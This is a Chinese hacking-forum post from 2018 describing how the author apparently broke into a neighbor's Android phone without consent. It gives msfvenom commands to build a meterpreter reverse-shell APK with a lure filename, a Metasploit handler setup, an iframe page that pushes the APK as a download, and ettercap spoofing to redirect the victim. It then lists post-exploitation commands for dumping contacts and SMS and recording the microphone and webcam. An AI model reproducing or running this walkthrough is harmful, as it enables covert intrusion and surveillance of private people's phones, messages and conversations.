找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2517|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 j3 q" Z2 ?- L- c1 }7 S 五、msf+ettercap入侵邻居安卓手机 ! s9 l( A! B d: ~: U" z

& H* v: W) N' e

! ^( X- P. z9 Q' S 首先启动msf : y! |/ l+ m v) Z+ b4 Q

7 W$ y% `; Q! o7 L

/ f2 L1 |7 Y& I7 e: { 先用kali生成一个安卓木马,如下命令: $ M( Z# w$ U, ]' X1 `, ^9 m$ e

) g3 B w4 p) f$ u+ }4 \; D

& f1 M' I: `( ^1 f8 w& @ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk / P: C* D' ?! W3 ~

; l* r4 Z7 \6 n9 @& a4 M& e

$ X/ V* R; N: h9 D( _! Z 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 + ]0 Y# ^1 n. d+ W

- p! m2 ]7 I& B7 N

* o2 z' X+ c5 A8 j. c0 Q2 v 然后进入msf F( t. Q; i ^* ]( x, V" G: L

" l- j* y; X* r9 e+ b0 d

8 ?) F! a) z$ H6 X use exploit/multi/handler # z. S/ u8 [& W/ G: Z

8 @3 k# T% H) c. `

( K" `+ s4 }+ Y/ Q; ^- m$ v set payload android/meterpreter/reverse_tcp $ a/ W9 Y! t2 {# u$ T( E

$ k% ^$ P# C6 g

3 c2 x5 J# d* c5 E set LHOST 192.168.0.109 //ipkailiip 0 T+ P9 S2 m( z2 C

7 p6 Q6 Y& t( \, U

' C2 u {# M* h* ~1 k( T set LPORT 44444 //端口一定要与前面生成的木马的端口一致 & D) K( |9 i0 P; O

2 l1 v3 P' a3 v: ^ d

0 l) L) G1 E# J/ g Exploit 0 P) B. }; Y- M- B; W

2 y6 N: u2 B% {" R, ~

4 v& y0 g- @: [* C( E7 B; c% h; M   " c ?0 t+ R: f2 X* e

2 e% ]* E" p0 J

9 h1 L7 x2 C( }! b/ x2 \ 下面我们开启ettercap -G 4 s3 ]+ S$ @3 C: w: E3 F

, s( _1 n9 v/ W3 X

+ X+ \# T2 u+ ?$ G4 ~2 C 我物理IP . n, N a$ d" J) N, C- i

+ ?1 B+ n& L: W% |- m* X

b1 l4 ]% i+ ]0 i   # Z ]1 m& T* n/ a& {2 i

0 j0 B# N0 W! _& J2 Y7 F

# }) w3 e; R1 z# w. K1 f 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 a4 |7 B9 n/ I! o

9 s; P4 z! v: O& {. H6 s) C

2 ~, P4 }1 u: u* z* [2 r 下面我们来设置一下 . M& Q, d. X& W: @; n( P |

3 g+ ~5 ?' x) W) D- r# T" u- u

' R$ q9 L1 l% ?   + `0 Z! ]4 f' A) @% j* J

7 T/ o1 {1 D- n' K' T' l

, S' x0 h* T/ v; C" N; y6 w/ C 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 9 u# g' `6 |& a/ P7 n' \' t; y* _

8 V1 ]1 |3 R/ X" X

0 m1 r% | V2 @* x7 h   ( c- U+ b- P& m

* e$ @: }0 [: c6 a; o1 p

+ a$ [' S- \; A0 K5 B   0 D, X$ o3 ?; }" `+ h# t6 L9 b3 Z

1 |7 P. N' N, F: G

% X: h5 f8 |; V- v; ~. J9 O5 W   % i+ l. S; P2 d6 J7 ^5 b

3 w7 f; Q/ V$ z6 r* E- I `

$ l4 P9 Z2 H) y; a ?& |   4 |9 W0 J: I7 R+ {1 @7 A: \2 R

+ |+ |. ]+ M6 B3 ^5 ?" O

- K' t+ w% M" }   + I+ y: x2 j+ H/ v0 ]- O

- |6 t; c4 O$ k8 W$ ]

8 e, y: y4 }/ n, Y& X   & F) [! M. i/ q _: [

- u7 r# k" l) J' L3 s: y) y

: o: y# m3 c1 z: m% ]   $ J0 i# {# w0 I

3 t) t; p T+ A1 ]9 R0 m4 z

. N6 x) {5 F. i) U: n* z   9 E. J& e( y8 \8 Y4 {

# o1 [$ Z9 ~' f W# P

3 D- [5 e& ~% F/ \) k8 C. O   ) X V4 ?* t+ C* P0 D0 n# p/ f

! H2 S, _5 N4 q: A. n

: b4 D; E/ P' @   7 U6 J. I0 k+ n- K

' c9 b) x( C/ ]* I. G. V6 v6 d

+ E+ w! N7 I2 \( R1 q+ p   , Q; a" y. K3 }4 d6 B5 Y

) t4 O7 H& t. z& B# M7 B

& t8 i" m9 z% I. W* N' z6 o2 S   + W" f: l0 ~! D! W% C5 }) g$ a

* q2 j- z' C& e& s

5 O+ |, P' {+ u   , |$ E+ }% C4 j" R: ~

) {6 W9 q6 y- i1 M# P6 I

8 d4 p- k+ S7 I- e% h- _ 下面我们开始攻击 + d+ q# o- I3 X& \

5 r# T1 S9 M8 N3 \0 ]& p

2 o! m2 j7 ` b- y0 e   ' p: ?1 Y! ~( U) ]' h

2 S* ~# e- s1 i- }+ H0 c6 |7 m

0 \7 ~. f( R! v   1 v; b2 ?0 D+ d( }2 G* X

, @% f0 S+ [% I

/ p8 t, L2 V4 i. M# i   " e0 S9 N4 V: t' R* b6 c% d$ C

" F' f; I# T5 N* x) d

! I e! y5 \1 P+ A1 a; ^! c% f   ( s, P# h! f) r2 l9 z7 o" B* m& q

+ J! p3 y/ X6 M9 u8 c8 a

& Q) [. O* a+ e   % [+ Q! v/ B5 p' Z0 V

0 ~3 h) P( t- a" s. b. A

0 d3 ?' J+ L0 Q3 `' s' l, @) ^ 大概过了5分钟多,发现反弹成功了 . ]+ v8 K2 _3 p

0 E3 C2 a. k o2 y0 d: l

; q- m e% S; Q! v! Y4 a0 r+ X   4 P) r7 |+ w# {: |* f7 O

p' B% K( X" S) }

! n5 w; W" }* R; }   & W: ~! K9 ?5 u5 q9 b8 w8 n

4 X: ]9 W! m2 a" b/ w) P

% e0 N$ u. u6 f8 R5 |; q% v   5 X2 X$ z5 R9 }( O

/ r: g1 Y- r+ o e$ o0 @

9 \7 }3 T, \5 [- S, M$ E( V- v   + M: r; {3 t i7 ^

A* \# f3 W2 x- N* s3 l. ^

$ f/ ]6 Y1 W5 H( a; Z7 N   ! ], \/ C8 @ W: U, T! y. L

0 I) o3 J% h6 O- [! g

: x7 k. }# U' O& m   9 V; R3 W$ F$ g& h3 q* S! }- e

7 ?8 v0 q) s1 i- Q( C2 P

9 I( D/ ~$ }' b7 ~1 |4 K6 V* n   2 ^8 l3 `& b) g# ]4 m( o# o8 N* {

, O0 x$ E/ J+ z: w) _

! V) }% c) t4 }4 ^$ [5 }0 V 执行命令 $ e3 j- e% r/ D& H; [

4 O; |4 D" u X) H9 E

( z7 b. a4 C" X   % Q) t3 W$ s6 W! X) L

* j2 k, q: G6 A* z! ?% n

5 Z) W* C& l+ W, g dump_contacts    --》这个是导出电话 ( J- \# f$ h0 x5 G2 |. l7 O9 M% e5 q

$ {! F! J {7 n' r$ U

7 F" J1 Y9 a! J dump_sms --》这个是导出信息 . ~, d4 e) ~4 J6 G

, `# s6 W' Q$ c9 _' v0 g

/ G! v3 `& X2 L. J; \4 s record_mic     Record audio from the default microphone for X seconds / O6 C6 f# d e, K

5 o: `% U% x& k+ g& k

' {& B1 i. E6 p* g. q8 {' ?) D     webcam_chat    Start a video chat / D# k3 q) a6 ]8 w

% a4 x1 C ^# l! {; Z( J" V# w

/ o X5 G7 y, R     webcam_list    List webcams 6 ~( R/ L( ]( P% b4 T& Z% W

& Z& N3 J: i2 } r

% I9 x1 D4 B$ |# w. ^( _# B3 s9 F     webcam_snap    Take a snapshot from the specified webcam 4 J* @6 d7 n( j% E

6 ?+ X& v" T+ C/ V

7 v+ ~& x* z7 I V1 j, v* Y' {5 \ webcam_stream  lay a video stream from the specified webcam ; H3 a' g2 R" m+ Q9 d

s& d; O3 j# C- G+ i) L. y

+ u3 n! r1 U# a ^   7 g# t8 {: n: { @$ X$ h

9 n4 m- u, a$ s5 `( g8 w0 Z" n8 C

0 I0 F. K) B7 X' h+ Z   % x: m; ~$ r2 {0 k! q) @$ F

& G( T/ w+ M$ R+ H# H9 Z$ u- k

: H3 ~5 f0 C5 B2 ?/ w' H- Z 我们打开看一下电话薄, , x1 ~8 g, N9 a5 D' H1 h% l

& z1 n0 G" g' G" E: ~

$ a# _/ }8 w" i) V1 T/ ^   8 D1 T- E" @- {; ~+ t

7 y% t, J& ~/ A! M, J

4 G$ J) w1 t2 _! T) P+ h7 G8 v   : U2 X9 Z; O, G( u G

" S4 Q2 z& J! r+ h) p+ V

) F( q9 D+ E& s8 v% }   & U* i: {( B9 j7 ?/ @. a

; b+ e6 h4 `3 k$ K# C

" Y9 L# M# [4 ]- B, r4 W   1 i$ U# s$ F3 J# t

4 q3 e9 t& h/ H! @. a

! o' }, r8 o0 {8 H# v4 W   7 H7 A7 {! x* q# c+ G

6 L+ L& N# R4 [# i2 B

& m$ u& P, Q9 }3 _- g& a   ! J* U$ W c* ]' }+ p; `! o

/ d( b; u5 o' e* {; G4 E" r

4 `- o! o0 O$ L! g. Z 我们同时欺骗成DroidJack木马,使用方法如图: 2 x9 W7 _7 P* ~. c2 W6 A; ?

) F0 G9 z, m$ k2 O% J9 C

7 b- F; ~5 F6 {& x   ) E9 v( k7 _1 a" ~8 _/ f

- [* _# i8 S, H) k# ~. J

# F' l5 e! ~+ o5 |6 G1 `/ Y0 U   + e# ^8 {6 J' c! X5 Y9 R

& C6 ]' a1 Q& u0 ^8 Q' ^3 k/ C

" O7 G- [) H, J9 Q2 u   ' L b' ~- V v% g+ {9 i8 G1 P

/ z% E! _, B [. B7 `; {% Z

9 n, K9 P; Q/ U. ^ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * N' z$ ~' e c

( D3 b4 V, ?+ p# p" b

2 E* U! }9 m3 O( M8 a   @8 c/ m& h) i/ z1 q8 F7 R

* Y/ y' q! |3 k' B) n, T* R

) {4 f `6 z G" Q6 _   , i+ G* T5 ?1 ~1 ]; v, \; m

: w5 D/ T) N. e/ }0 z; g

; e1 N4 g' h" z8 G) ^   ' z0 O! F; k0 N& z S

+ B. m0 l0 u+ l# I. o7 ? K

/ L1 [$ `3 E5 a+ J& a4 {8 r% B 2 D$ j* u o, \: a

% B2 v$ J, H0 c2 v, z. j" q! }4 G

; j5 a8 [! Q* C7 O% \2 u$ y/ z
! y5 ~' q; f: W# ?& h

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表